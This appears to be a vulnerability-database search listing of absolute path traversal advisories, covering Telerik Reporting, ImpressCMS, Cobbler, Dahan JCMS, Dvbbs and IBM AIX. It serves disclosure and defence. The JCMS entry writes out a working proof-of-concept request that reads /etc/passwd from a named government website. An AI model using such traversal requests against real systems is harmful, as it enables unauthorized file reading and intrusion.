16 matches found
EUVD-2005-4063
Malware in sbrugna...
EUVD-2025-4302
Malicious code in bioql PyPI...
CVE-2024-6097
In Progress® Telerik® Reporting versions prior to 2025 Q1 19.0.25.211, information disclosure is possible by a local threat actor through an absolute path vulnerability...
Progress Telerik Reporting < 2025 Q1 (19.0.25.211) Information Disclosure
The version of Progress Telerik Reporting installed on the remote Windows host is prior or equal to 2025 Q1 19.0.25.211. It is, therefore, affected by an information disclosure vulnerability. Information disclosure is possible by a local threat actor through an absolute path vulnerability. Note...
CVE-2024-6097
In Progress® Telerik® Reporting versions prior to 2025 Q1 19.0.25.211, information disclosure is possible by a local threat actor through an absolute path vulnerability...
CVE-2024-6097
Progress Telerik Reporting (Progress) is affected in versions prior to 2025 Q1 (19.0.25.211). The vulnerability is an information disclosure via an absolute path traversal that can be exploited by a local threat actor, as described in multiple sources. The CVE-2024-6097 entry confirms the impact ...
CVE-2024-6097 Absolute Path Traversal Vulnerability
In Progress® Telerik® Reporting versions prior to 2025 Q1 19.0.25.211, information disclosure is possible by a local threat actor through an absolute path vulnerability...
Progress Telerik Reporting security vulnerability
Progress Telerik Reporting is a .NET report embedding tool from Progress, Inc. that enables the creation, design, export, and integration of reports in cloud-based, web and applications. A security vulnerability exists in Progress Telerik Reporting prior to version 2025 Q1, which stems from a loc...
Path traversal
Absolute path traversal vulnerability in htdocs/libraries/image-editor/image-edit.php in ImpressCMS before 1.3.6 allows remote attackers to delete arbitrary files via a full pathname in the imagepath parameter in a cancel action...
Path traversal
Absolute path traversal vulnerability in proxy.php in the google currency lookup in the Paypal Currency Converter Basic For WooCommerce plugin before 1.4 for WordPress allows remote attackers to read arbitrary files via a full pathname in the requrl parameter...
Path traversal
Absolute path traversal vulnerability in the web interface in Cobbler 2.4.x through 2.6.x allows remote authenticated users to read arbitrary files via the Kickstart field in a profile...
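大汉网络 (Dahan Network) JCMS arbitrary file download
Brief description: An absolute-path file download issue. Details: Code analysis shows that a download function does not restrict permissions or the types of files that can be downloaded; by setting a parameter to an absolute path, a file can be downloaded directly. Exploitation: jcms\m19\user\down.jsp?abspathfile=/etc/passwd Proof of vulnerability: Test code: http://www.njgl.gov.cn/jcms/m19/user/down.jsp?abspathfile=/etc/passwd Gulou District government portal website: Downloaded file content:...
Dvbbs (动网) absolute path disclosure vulnerability
The problem is at line 44 of DvClsMain.asp: CacheName = Lcase(Replace(Replace(Replace(Server.MapPath("index.asp"),"index.asp",""),":",""),"\\\\","")) and at line 46: Forumsn = Replace(CacheName,"","") This places the web absolute path into Forumsn, which is then returned to the client as a cookie, disclosing the web absolute path. DVBBS 7.1.0: update to the latest patch....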
CVE-2005-4068
Unspecified "absolute path vulnerability" in umountall in IBM AIX 5.1 through 5.3 allows local users to cause unknown impact via unknown vectors...
CVE-2005-4068
The CVE-2005-4068 entry concerns an unspecified absolute path vulnerability in the AIX utility umountall, affecting IBM AIX 5.1–5.3 with local-access implications (exact impact and vectors not disclosed in the provided documents). Connected sources identify vendor patches related to bos.rte.files...
CVE-2005-4068
Unspecified "absolute path vulnerability" in umountall in IBM AIX 5.1 through 5.3 allows local users to cause unknown impact via unknown vectors...